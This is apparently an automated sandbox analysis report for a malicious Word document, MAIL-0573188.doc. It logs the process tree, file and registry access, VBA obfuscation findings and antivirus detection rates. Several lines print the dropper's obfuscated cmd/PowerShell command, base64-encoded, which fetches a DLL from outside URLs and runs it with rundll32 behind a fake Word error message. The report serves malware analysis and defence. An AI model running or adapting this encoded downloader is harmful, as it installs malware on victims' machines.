Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............z..j..... ..............................}..v....P.......0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............J..j.....(..............................}..v............0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+...............J..j.....(..............................}..v....P.......0.................Q.............$...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL

Source: MAIL-0573188.doc	Virustotal: Detection: 66%
Source: MAIL-0573188.doc	Metadefender: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp

Source: MAIL-0573188.doc

Initial sample: OLE summary subject = Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: MAIL-0573188.doc	Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788			Name: Owppnp8hah4xo788

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwA